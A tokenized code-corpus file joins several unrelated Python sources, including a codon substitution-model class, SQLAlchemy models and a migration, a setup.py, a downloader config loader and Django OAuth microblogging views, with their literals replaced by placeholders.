model_type == '<STR_LIT>' : <EOL> self . params = MechCodon_Sanity ( self . model_type , self . params , size = <NUM_LIT> , hetcodon_model = self . hetcodon_model ) ( ) <EOL> if self . hetcodon_model : <EOL> self . _assign_hetcodon_model_matrices ( ) <EOL> else : <EOL> self . matrix = MechCodon_Matrix ( self . model_type , self . params ) ( ) <EOL> elif '<STR_LIT>' in self . model_type : <EOL> self . params = ECM_Sanity ( self . model_type , self . params , size = <NUM_LIT> ) ( ) <EOL> self . matrix = ECM_Matrix ( self . model_type , self . params ) ( ) <EOL> elif self . model_type == '<STR_LIT>' : <EOL> self . params = MutSel_Sanity ( self . model_type , self . params ) ( ) <EOL> self . matrix = MutSel_Matrix ( self . model_type , self . params ) ( ) <EOL> if not self . params [ "<STR_LIT>" ] : <EOL> self . _calculate_state_freqs_from_matrix ( ) <EOL> elif self . model_type == '<STR_LIT>' : <EOL> self . _assign_custom_matrix ( ) <EOL> self . _calculate_state_freqs_from_matrix ( ) <EOL> np . savetxt ( self . _save_custom_matrix_freqs , self . params [ "<STR_LIT>" ] ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> assert ( "<STR_LIT>" in self . params ) , "<STR_LIT>" <EOL> def _assign_custom_matrix ( self ) : <EOL> '''<STR_LIT>''' <EOL> custom_matrix = np . array ( self . params [ '<STR_LIT>' ] ) <EOL> if "<STR_LIT:code>" in self . params : <EOL> assert ( type ( self . params [ "<STR_LIT:code>" ] ) is list ) , "<STR_LIT>" <EOL> for item in self . params [ "<STR_LIT:code>" ] : <EOL> assert ( type ( item ) is str ) , "<STR_LIT>" <EOL> dim = len ( self . params [ "<STR_LIT:code>" ] ) <EOL> assert ( custom_matrix . shape == ( dim , dim ) ) , "<STR_LIT>" <EOL> else : <EOL> assert ( custom_matrix . shape == ( <NUM_LIT:4> , <NUM_LIT:4> ) or custom_matrix . shape == ( <NUM_LIT:20> , <NUM_LIT:20> ) or custom_matrix . shape == ( <NUM_LIT> , <NUM_LIT> ) ) , "<STR_LIT>" <EOL> dim = custom_matrix . shape [ <NUM_LIT:0> ] <EOL> assert ( np . allclose ( np . 
zeros ( dim ) , np . sum ( custom_matrix , <NUM_LIT:1> ) , rtol = <NUM_LIT> ) ) , "<STR_LIT>" <EOL> for s in range ( dim ) : <EOL> temp_sum = np . sum ( custom_matrix [ s ] ) - np . sum ( custom_matrix [ s ] [ s ] ) <EOL> custom_matrix [ s ] [ s ] = - <NUM_LIT:1.> * temp_sum <EOL> assert ( abs ( np . sum ( custom_matrix [ s ] ) ) <= ZERO ) , "<STR_LIT>" <EOL> self . matrix = custom_matrix <EOL> def _assign_hetcodon_model_matrices ( self ) : <EOL> '''<STR_LIT>''' <EOL> dnds_values = np . array ( self . params [ "<STR_LIT>" ] ) / np . array ( self . params [ "<STR_LIT>" ] ) <EOL> self . params [ "<STR_LIT>" ] = np . average ( dnds_values , weights = self . rate_probs ) <EOL> self . matrix = [ ] <EOL> for i in range ( len ( self . params [ '<STR_LIT>' ] ) ) : <EOL> temp_params = deepcopy ( self . params ) <EOL> temp_params [ '<STR_LIT>' ] = self . params [ '<STR_LIT>' ] [ i ] <EOL> temp_params [ '<STR_LIT>' ] = self . params [ '<STR_LIT>' ] [ i ] <EOL> mb = MechCodon_Matrix ( self . model_type , temp_params ) <EOL> self . matrix . append ( mb ( ) ) <EOL> assert ( len ( self . matrix ) > <NUM_LIT:0> ) , "<STR_LIT>" <EOL> def _calculate_state_freqs_from_matrix ( self ) : <EOL> '''<STR_LIT>''' <EOL> size = self . matrix . shape [ <NUM_LIT:0> ] <EOL> ( w , v ) = linalg . eig ( self . matrix , left = True , right = False ) <EOL> max_i = np . argmax ( w ) <EOL> max_w = w [ max_i ] <EOL> assert ( abs ( max_w ) <= ZERO ) , "<STR_LIT>" <EOL> max_v = v [ : , max_i ] <EOL> max_v /= np . sum ( max_v ) <EOL> eq_freqs = max_v . real <EOL> eq_freqs [ eq_freqs == <NUM_LIT:0.> ] = ZERO <EOL> assert ( abs ( <NUM_LIT:1.> - np . sum ( eq_freqs ) ) <= ZERO ) , "<STR_LIT>" <EOL> assert np . allclose ( np . zeros ( size ) , np . dot ( eq_freqs , self . matrix ) ) , "<STR_LIT>" <EOL> pi_inv = np . diag ( <NUM_LIT:1.0> / eq_freqs ) <EOL> s = np . dot ( self . matrix , pi_inv ) <EOL> assert np . allclose ( self . matrix , np . dot ( s , np . 
diag ( eq_freqs ) ) , atol = ZERO , rtol = <NUM_LIT> ) , "<STR_LIT>" <EOL> assert ( not np . allclose ( eq_freqs , np . zeros ( size ) ) ) , "<STR_LIT>" <EOL> self . params [ "<STR_LIT>" ] = eq_freqs <EOL> def _assign_rates ( self ) : <EOL> '''<STR_LIT>''' <EOL> if "<STR_LIT>" in self . model_type : <EOL> self . rate_probs = np . ones ( <NUM_LIT:1> ) <EOL> else : <EOL> if self . alpha is not None : <EOL> assert ( self . pinv >= <NUM_LIT:0.> and self . pinv <= <NUM_LIT:1.> ) , "<STR_LIT>" <EOL> self . _draw_gamma_rates ( ) <EOL> else : <EOL> self . _assign_rate_probs ( ) <EOL> self . _sanity_rate_factors ( ) <EOL> def _draw_gamma_rates ( self ) : <EOL> '''<STR_LIT>''' <EOL> if self . rate_probs is not None : <EOL> warn ( "<STR_LIT>" ) <EOL> if type ( self . k_gamma ) is not int : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> rv = gamma ( self . alpha , scale = <NUM_LIT:1.> / self . alpha ) <EOL> freqK = np . zeros ( self . k_gamma ) <EOL> rK = np . zeros ( self . k_gamma ) <EOL> for i in range ( self . k_gamma - <NUM_LIT:1> ) : <EOL> raw = rv . ppf ( ( i + <NUM_LIT:1.> ) / self . k_gamma ) <EOL> freqK [ i ] = gammainc ( self . alpha + <NUM_LIT:1> , raw * self . alpha ) <EOL> rK [ <NUM_LIT:0> ] = freqK [ <NUM_LIT:0> ] * self . k_gamma <EOL> rK [ self . k_gamma - <NUM_LIT:1> ] = ( <NUM_LIT:1> - freqK [ self . k_gamma - <NUM_LIT:2> ] ) * self . k_gamma <EOL> for i in range ( <NUM_LIT:1> , self . k_gamma - <NUM_LIT:1> ) : <EOL> rK [ i ] = self . k_gamma * ( freqK [ i ] - freqK [ i - <NUM_LIT:1> ] ) <EOL> if self . pinv <= ZERO : <EOL> self . rate_probs = np . repeat ( <NUM_LIT:1.> / self . k_gamma , self . k_gamma ) <EOL> self . rate_factors = deepcopy ( rK ) <EOL> else : <EOL> freqK *= ( <NUM_LIT:1.> - self . pinv ) <EOL> freqK = list ( freqK ) <EOL> freqK . append ( self . pinv ) <EOL> self . rate_probs = np . array ( freqK ) <EOL> rK = list ( rK ) <EOL> rK . append ( <NUM_LIT:0.> ) <EOL> self . rate_factors = np . 
array ( rK ) <EOL> def _assign_rate_probs ( self ) : <EOL> '''<STR_LIT>''' <EOL> if self . hetcodon_model : <EOL> num_probs = len ( self . params [ "<STR_LIT>" ] ) <EOL> else : <EOL> num_probs = len ( self . rate_factors ) <EOL> if self . rate_probs is None : <EOL> self . rate_probs = np . repeat ( <NUM_LIT:1.> / num_probs , num_probs ) <EOL> assert ( abs ( <NUM_LIT:1.> - np . sum ( self . rate_probs ) ) <= ZERO ) , "<STR_LIT>" <EOL> try : <EOL> self . rate_probs = np . array ( self . rate_probs ) <EOL> except : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> assert ( len ( self . rate_probs ) == num_probs ) , "<STR_LIT>" <EOL> def _sanity_rate_factors ( self ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> self . rate_factors = np . array ( self . rate_factors ) <EOL> except : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if abs ( <NUM_LIT:1.> - np . sum ( self . rate_probs * self . rate_factors ) ) > ZERO : <EOL> self . rate_factors /= np . sum ( self . rate_factors * self . rate_probs ) <EOL> def num_classes ( self ) : <EOL> '''<STR_LIT>''' <EOL> return len ( self . rate_probs ) <EOL> def assign_name ( self , name ) : <EOL> '''<STR_LIT>''' <EOL> self . name = name <EOL> def is_hetcodon_model ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . hetcodon_model <EOL> def extract_mutation_rates ( self ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> return self . params [ "<STR_LIT>" ] <EOL> except : <EOL> print ( "<STR_LIT>" ) <EOL> def extract_rate_matrix ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . matrix <EOL> def extract_state_freqs ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . params [ "<STR_LIT>" ] <EOL> def extract_parameters ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . params </s>
<s> from raggregate . models import * <EOL> import sqlalchemy <EOL> from sqlalchemy import Column <EOL> from sqlalchemy import UnicodeText <EOL> from sqlalchemy import DateTime <EOL> from sqlalchemy import ForeignKey <EOL> from raggregate . guid_recipe import GUID <EOL> import datetime <EOL> class Notify ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( GUID , primary_key = True ) <EOL> user_id = Column ( GUID , ForeignKey ( '<STR_LIT>' ) ) <EOL> target_id = Column ( GUID ) <EOL> target_type = Column ( UnicodeText ) <EOL> added_on = Column ( DateTime ) <EOL> added_by = Column ( GUID , ForeignKey ( '<STR_LIT>' ) ) <EOL> def __init__ ( self , user_id = None , target_id = None , target_type = None , <EOL> added_on = None , added_by = None ) : <EOL> self . user_id = user_id <EOL> self . target_id = target_id <EOL> self . target_type = target_type <EOL> self . added_by = added_by <EOL> if added_on : <EOL> self . added_on = added_on <EOL> else : <EOL> self . added_on = datetime . datetime . utcnow ( ) </s>
<s> from sqlalchemy import * <EOL> from migrate import * <EOL> from raggregate . guid_recipe import GUID <EOL> def upgrade ( migrate_engine ) : <EOL> meta = MetaData ( bind = migrate_engine ) <EOL> comments = Table ( '<STR_LIT>' , meta , autoload = True ) <EOL> unreadc = Column ( '<STR_LIT>' , Boolean , default = True ) <EOL> in_reply_toc = Column ( '<STR_LIT>' , GUID , nullable = True ) <EOL> unreadc . create ( comments ) <EOL> in_reply_toc . create ( comments ) <EOL> def downgrade ( migrate_engine ) : <EOL> meta = MetaData ( bind = migrate_engine ) <EOL> comments = Table ( '<STR_LIT>' , meta , autoload = True ) <EOL> comments . c . unread . drop ( ) <EOL> comments . c . in_reply_to . drop ( ) </s>
<s> import os <EOL> import sys <EOL> from setuptools import setup , find_packages <EOL> here = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> README = open ( os . path . join ( here , '<STR_LIT>' ) ) . read ( ) <EOL> CHANGES = open ( os . path . join ( here , '<STR_LIT>' ) ) . read ( ) <EOL> requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> if sys . version_info [ : <NUM_LIT:3> ] < ( <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:0> ) : <EOL> requires . append ( '<STR_LIT>' ) <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = README + '<STR_LIT>' + CHANGES , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> keywords = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> zip_safe = False , <EOL> test_suite = '<STR_LIT>' , <EOL> install_requires = requires , <EOL> entry_points = """<STR_LIT>""" , <EOL> paster_plugins = [ '<STR_LIT>' ] , <EOL> dependency_links = [ '<STR_LIT>' ] <EOL> ) </s>
<s> from os import path <EOL> import os <EOL> import shutil , sys <EOL> import ConfigParser <EOL> import log , util <EOL> import traceback <EOL> PKG_PATH = path . dirname ( __file__ ) <EOL> APP_PATH = path . join ( PKG_PATH , "<STR_LIT>" ) <EOL> USER_PATH = path . join ( os . getenv ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> SAMPLE_CONF = path . join ( PKG_PATH , '<STR_LIT>' , '<STR_LIT>' ) <EOL> SAMPLE_DB = path . join ( PKG_PATH , '<STR_LIT>' , '<STR_LIT>' ) <EOL> CONF_FILE = path . join ( USER_PATH , "<STR_LIT>" ) <EOL> HIST_DB = path . join ( USER_PATH , "<STR_LIT>" ) <EOL> LANG = '<STR_LIT>' <EOL> CHINA_PROXY_HTTP = None <EOL> XIAMI_LOGIN_EMAIL = None <EOL> XIAMI_LOGIN_PASSWORD = None <EOL> LOG_LVL_FILE = '<STR_LIT>' <EOL> LOG_LVL_CONSOLE = '<STR_LIT>' <EOL> THREAD_POOL_SIZE = <NUM_LIT:3> <EOL> DOWNLOAD_DIR = '<STR_LIT>' <EOL> SHOW_DONE_NUMBER = <NUM_LIT:5> <EOL> DOWNLOAD_TOP_SONG = <NUM_LIT:10> <EOL> var_dict = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:s>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:s>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:s>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:s>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:p>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:s>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:s>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:n>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:n>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:n>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:s>' ) <EOL> } <EOL> def load_single_config ( conf_parser , conf_key ) : <EOL> config_warn_msg = "<STR_LIT>" <EOL> try : <EOL> v = conf_parser . get ( '<STR_LIT>' , conf_key ) <EOL> if not v : <EOL> raise Exception ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> gkey = var_dict [ conf_key ] [ <NUM_LIT:0> ] <EOL> ty = var_dict [ conf_key ] [ <NUM_LIT:1> ] <EOL> if ty == '<STR_LIT:n>' : <EOL> globals ( ) [ gkey ] = int ( v ) <EOL> else : <EOL> if ty == '<STR_LIT:p>' : <EOL> util . 
create_dir ( v ) <EOL> globals ( ) [ gkey ] = v <EOL> except : <EOL> if not conf_key . find ( '<STR_LIT>' ) : <EOL> log . warn ( config_warn_msg % ( conf_key , str ( globals ( ) [ var_dict [ conf_key ] [ <NUM_LIT:0> ] ] ) ) ) <EOL> def load_config ( ) : <EOL> if not path . exists ( CONF_FILE ) : <EOL> init_config ( ) <EOL> if not path . exists ( HIST_DB ) : <EOL> init_history_db ( ) <EOL> cf = ConfigParser . ConfigParser ( ) <EOL> cf . read ( CONF_FILE ) ; <EOL> for k in var_dict : <EOL> load_single_config ( cf , k ) <EOL> def init_history_db ( ) : <EOL> """<STR_LIT>""" <EOL> shutil . copy ( SAMPLE_DB , HIST_DB ) <EOL> def init_config ( ) : <EOL> """<STR_LIT>""" <EOL> os . makedirs ( USER_PATH ) <EOL> shutil . copy ( SAMPLE_CONF , CONF_FILE ) </s>
<s> from django . template import RequestContext <EOL> from django . http import HttpResponseRedirect , Http404 , HttpResponse <EOL> from django . shortcuts import render_to_response , get_object_or_404 <EOL> from django . db import models <EOL> from django . conf import settings <EOL> from django . contrib . sites . models import Site <EOL> from django . contrib . auth . models import User <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> from django . core . urlresolvers import reverse <EOL> from omb . forms import RemoteSubscribeForm , AuthorizeForm <EOL> from omb import oauthUtils , oauthConsumer , OAUTH_REQUEST , OAUTH_ACCESS , OMB_POST_NOTICE , OMB_UPDATE_PROFILE , OAUTH_AUTHORIZE , OMB_VERSION_01 <EOL> from omb . models import RemoteProfile <EOL> from oauth . oauth import OAuthRequest , OAuthServer , OAuthSignatureMethod_HMAC_SHA1 , OAuthSignatureMethod_PLAINTEXT , OAuthError <EOL> from oauth_provider . stores import DataStore <EOL> from oauth_provider . views import request_token , user_authorization <EOL> from oauth_provider . models import Consumer <EOL> import urllib <EOL> signature_methods = { <EOL> OAuthSignatureMethod_HMAC_SHA1 ( ) . get_name ( ) : OAuthSignatureMethod_HMAC_SHA1 ( ) , <EOL> OAuthSignatureMethod_PLAINTEXT ( ) . get_name ( ) : OAuthSignatureMethod_PLAINTEXT ( ) <EOL> } <EOL> def follow ( request ) : <EOL> if request . method == "<STR_LIT:GET>" : <EOL> form = RemoteSubscribeForm ( initial = { '<STR_LIT:username>' : request . GET . get ( '<STR_LIT:username>' ) } ) <EOL> else : <EOL> current_site = Site . objects . get_current ( ) <EOL> form = RemoteSubscribeForm ( request . POST ) <EOL> if form . is_valid ( ) : <EOL> user = User . objects . get ( username = form . cleaned_data [ '<STR_LIT:username>' ] ) <EOL> omb = oauthUtils . getServices ( form . cleaned_data [ '<STR_LIT>' ] ) <EOL> token = oauthConsumer . requestToken ( omb ) <EOL> oauthRequest = oauthConsumer . 
requestAuthorization ( token , omb [ OAUTH_AUTHORIZE ] . uris [ <NUM_LIT:0> ] . uri , omb [ OAUTH_REQUEST ] . localid . text , user ) <EOL> omb_session = { <EOL> '<STR_LIT>' : user . username , <EOL> '<STR_LIT>' : omb [ OAUTH_REQUEST ] . localid . text , <EOL> '<STR_LIT>' : token . key , <EOL> '<STR_LIT>' : token . secret , <EOL> '<STR_LIT>' : omb [ OAUTH_ACCESS ] . uris [ <NUM_LIT:0> ] . uri , <EOL> '<STR_LIT>' : omb [ OMB_POST_NOTICE ] . uris [ <NUM_LIT:0> ] . uri , <EOL> '<STR_LIT>' : omb [ OMB_UPDATE_PROFILE ] . uris [ <NUM_LIT:0> ] . uri , <EOL> } <EOL> request . session [ '<STR_LIT>' ] = omb_session <EOL> return HttpResponseRedirect ( oauthRequest . to_url ( ) ) <EOL> return render_to_response ( '<STR_LIT>' , { '<STR_LIT>' : form } ) <EOL> def finish_follow ( request ) : <EOL> omb_session = request . session [ '<STR_LIT>' ] <EOL> oauth_request = OAuthRequest . from_request ( request . method , request . build_absolute_uri ( ) , headers = request . META ) <EOL> accessToken = oauthConsumer . requestAccessToken ( omb_session , oauth_request ) <EOL> try : <EOL> remote_profile = RemoteProfile . objects . get ( uri = omb_session [ "<STR_LIT>" ] ) <EOL> except : <EOL> remote_profile = RemoteProfile ( ) <EOL> remote_profile . username = oauth_request . get_parameter ( "<STR_LIT>" ) <EOL> remote_profile . uri = omb_session [ "<STR_LIT>" ] <EOL> remote_profile . url = oauth_request . get_parameter ( '<STR_LIT>' ) <EOL> remote_profile . avatar = oauth_request . get_parameter ( '<STR_LIT>' ) <EOL> remote_profile . post_notice_url = omb_session [ "<STR_LIT>" ] <EOL> remote_profile . update_profile_url = omb_session [ "<STR_LIT>" ] <EOL> remote_profile . token = accessToken . key <EOL> remote_profile . secret = accessToken . secret <EOL> remote_profile . save ( ) <EOL> user = User . objects . get ( username = omb_session [ '<STR_LIT>' ] ) <EOL> app_label , model_name = settings . OMB_FOLLOWING_MODULE . split ( '<STR_LIT:.>' ) <EOL> model = models . 
get_model ( app_label , model_name ) <EOL> following = model ( ) <EOL> following . followed_content_object = user <EOL> following . follower_content_object = remote_profile <EOL> following . save ( ) <EOL> return HttpResponseRedirect ( user . get_absolute_url ( ) ) <EOL> def post_notice ( request ) : <EOL> current_site = Site . objects . get_current ( ) <EOL> oauth_req = OAuthRequest . from_request ( request . method , request . build_absolute_uri ( ) , headers = request . META , parameters = request . POST . copy ( ) ) <EOL> if not oauth_req : <EOL> return HttpResponse ( "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> else : <EOL> oauth_server = OAuthServer ( data_store = DataStore ( oauth_req ) , signature_methods = signature_methods ) <EOL> oauth_server . verify_request ( oauth_req ) <EOL> version = oauth_req . get_parameter ( '<STR_LIT>' ) <EOL> if version != OMB_VERSION_01 : <EOL> return HttpResponse ( "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> listenee = oauth_req . get_parameter ( '<STR_LIT>' ) <EOL> try : <EOL> remote_profile = RemoteProfile . objects . get ( uri = listenee ) <EOL> except ObjectDoesNotExist : <EOL> return HttpResponse ( "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> content = oauth_req . get_parameter ( '<STR_LIT>' ) <EOL> if not content or len ( content ) > <NUM_LIT> : <EOL> return HttpResponse ( "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> notice_uri = oauth_req . get_parameter ( '<STR_LIT>' ) <EOL> notice_url = oauth_req . get_parameter ( "<STR_LIT>" ) <EOL> notice_app_label , notice_model_name = settings . OMB_NOTICE_MODULE . split ( '<STR_LIT:.>' ) <EOL> noticeModel = models . get_model ( notice_app_label , notice_model_name ) <EOL> notice = noticeModel ( ) <EOL> notice . sender = remote_profile <EOL> notice . text = content <EOL> notice . save ( ) <EOL> return HttpResponse ( "<STR_LIT>" % OMB_VERSION_01 , mimetype = "<STR_LIT>" ) <EOL> def updateprofile ( request ) : <EOL> oauth_req = OAuthRequest . from_request ( request . 
method , request . build_absolute_uri ( ) , headers = request . META , parameters = request . POST . copy ( ) ) <EOL> return HttpResponse ( "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> if not oauth_req : <EOL> return HttpResponse ( "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> else : <EOL> oauth_server = OAuthServer ( data_store = DataStore ( oauth_req ) , signature_methods = signature_methods ) <EOL> oauth_server . verify_request ( oauth_req ) <EOL> omb_version = oauth_req . get_parameter ( '<STR_LIT>' ) <EOL> if omb_version != OMB_VERSION_01 : <EOL> return HttpResponse ( "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> omb_listenee = oauth_req . get_parameter ( '<STR_LIT>' ) <EOL> try : <EOL> remote_profile = RemoteProfile . objects . get ( uri = omb_listenee ) <EOL> omb_listenee_profile = _get_oauth_param ( oauth_req , '<STR_LIT>' ) <EOL> if omb_listenee_profile != None : <EOL> remote_profile . url = omb_listenee_profile <EOL> omb_listenee_nickname = _get_oauth_param ( oauth_req , '<STR_LIT>' ) <EOL> if omb_listenee_nickname != None : <EOL> remote_profile . username = omb_listenee_nickname <EOL> omb_listenee_license = _get_oauth_param ( oauth_req , '<STR_LIT>' ) <EOL> if omb_listenee_license != None : <EOL> remote_profile . license = omb_listenee_license <EOL> omb_listenee_fullname = _get_oauth_param ( oauth_req , '<STR_LIT>' ) <EOL> if omb_listenee_fullname != None : <EOL> remote_profile . fullname = omb_listenee_fullname <EOL> omb_listenee_homepage = _get_oauth_param ( oauth_req , '<STR_LIT>' ) <EOL> if omb_listenee_homepage != None : <EOL> remote_profile . homepage = omb_listenee_homepage <EOL> omb_listenee_bio = _get_oauth_param ( oauth_req , '<STR_LIT>' ) <EOL> if omb_listenee_bio != None : <EOL> remote_profile . bio = omb_listenee_bio <EOL> omb_listenee_location = _get_oauth_param ( oauth_req , '<STR_LIT>' ) <EOL> if omb_listenee_location != None : <EOL> remote_profile . 
location = omb_listenee_location <EOL> omb_listenee_avatar = _get_oauth_param ( oauth_req , '<STR_LIT>' ) <EOL> if omb_listenee_avatar != None : <EOL> remote_profile . avatar = omb_listenee_avatar <EOL> remote_profile . save ( ) <EOL> return HttpResponse ( "<STR_LIT>" % OMB_VERSION_01 , mimetype = "<STR_LIT>" ) <EOL> except ObjectDoesNotExist : <EOL> return HttpResponse ( "<STR_LIT>" , mimetype = "<STR_LIT>" ) <EOL> def _get_oauth_param ( oauth_req , field_name ) : <EOL> try : <EOL> return oauth_req . get_parameter ( field_name ) <EOL> except OAuthError : <EOL> return None <EOL> def xrds ( request , username ) : <EOL> current_site = Site . objects . get_current ( ) <EOL> other_user = get_object_or_404 ( User , username = username ) <EOL> return render_to_response ( "<STR_LIT>" , { "<STR_LIT>" : current_site . domain , "<STR_LIT>" : other_user } , mimetype = "<STR_LIT>" , context_instance = RequestContext ( request ) ) <EOL> def omb_request_token ( request ) : <EOL> consumer_key = request . REQUEST . get ( "<STR_LIT>" ) <EOL> try : <EOL> Consumer . objects . get ( name = consumer_key , key = consumer_key ) <EOL> except ObjectDoesNotExist : <EOL> Consumer . objects . create ( name = consumer_key , key = consumer_key ) <EOL> response = request_token ( request ) <EOL> return response <EOL> def authorize ( request ) : <EOL> if request . method == "<STR_LIT:GET>" : <EOL> return user_authorization ( request ) <EOL> else : <EOL> current_site = Site . objects . get_current ( ) <EOL> user_profile_url = "<STR_LIT>" % ( current_site . domain , reverse ( '<STR_LIT>' , args = [ request . user . username ] ) ) <EOL> response = user_authorization ( request ) <EOL> if type ( response ) == HttpResponseRedirect : <EOL> try : <EOL> remote_profile = RemoteProfile . objects . get ( uri = request . GET . get ( "<STR_LIT>" ) ) <EOL> except : <EOL> remote_profile = RemoteProfile ( ) <EOL> remote_profile . username = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . uri = request . 
GET . get ( "<STR_LIT>" ) <EOL> remote_profile . url = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . license = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . fullname = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . homepage = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . bio = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . location = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . avatar = request . GET . get ( "<STR_LIT>" ) <EOL> remote_profile . save ( ) <EOL> app_label , model_name = settings . OMB_FOLLOWING_MODULE . split ( '<STR_LIT:.>' ) <EOL> following_model = models . get_model ( app_label , model_name ) <EOL> following = following_model ( ) <EOL> following . followed_content_object = remote_profile <EOL> following . follower_content_object = request . user <EOL> following . save ( ) <EOL> location = response [ '<STR_LIT>' ] <EOL> params = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : request . user . username , <EOL> "<STR_LIT>" : user_profile_url , <EOL> } <EOL> if location . find ( "<STR_LIT:?>" ) > - <NUM_LIT:1> : <EOL> location += "<STR_LIT>" % urllib . urlencode ( params ) <EOL> else : <EOL> location += "<STR_LIT>" % urllib . urlencode ( params ) <EOL> response [ '<STR_LIT>' ] = location <EOL> return response <EOL> def oauth_authorize ( request , token , callback , params ) : <EOL> if request . method == "<STR_LIT:GET>" : <EOL> form = AuthorizeForm ( { <EOL> '<STR_LIT>' : token . key , <EOL> } ) <EOL> context_vars = { <EOL> "<STR_LIT>" : form , <EOL> "<STR_LIT:username>" : request . GET . get ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : request . GET . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : request . GET . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT:location>" : request . GET . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : request . GET . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : request . META . 
get ( "<STR_LIT>" ) <EOL> } <EOL> else : <EOL> form = AuthorizeForm ( request . POST ) <EOL> print request . POST <EOL> return render_to_response ( "<STR_LIT>" , context_vars , context_instance = RequestContext ( request ) ) </s>
<s> class Menu : <EOL> def __init__ ( self , rdoc , on_add = None ) : <EOL> self . rdoc = rdoc <EOL> self . element = rdoc . element ( '<STR_LIT>' ) <EOL> vn = '<STR_LIT:#>' + self . element . varname <EOL> self . rule_menu = rdoc . stylesheet . rule ( vn ) <EOL> self . rule_item = rdoc . stylesheet . rule ( vn + '<STR_LIT>' ) <EOL> self . rule_item_hover = rdoc . stylesheet . rule ( vn + '<STR_LIT>' ) <EOL> self . rule_item_selected = rdoc . stylesheet . rule ( vn + '<STR_LIT>' ) <EOL> self . rule_item_selected_hover = rdoc . stylesheet . rule ( vn + '<STR_LIT>' ) <EOL> self . on_add = on_add <EOL> self . id_dict = { } <EOL> def add_item ( self , * varargs ) : <EOL> for text in varargs : <EOL> i = self . rdoc . element ( '<STR_LIT>' , text ) <EOL> self . id_dict [ i . att . varname ] = i <EOL> self . element . append ( i ) <EOL> if self . on_add : <EOL> self . on_add ( i ) </s>
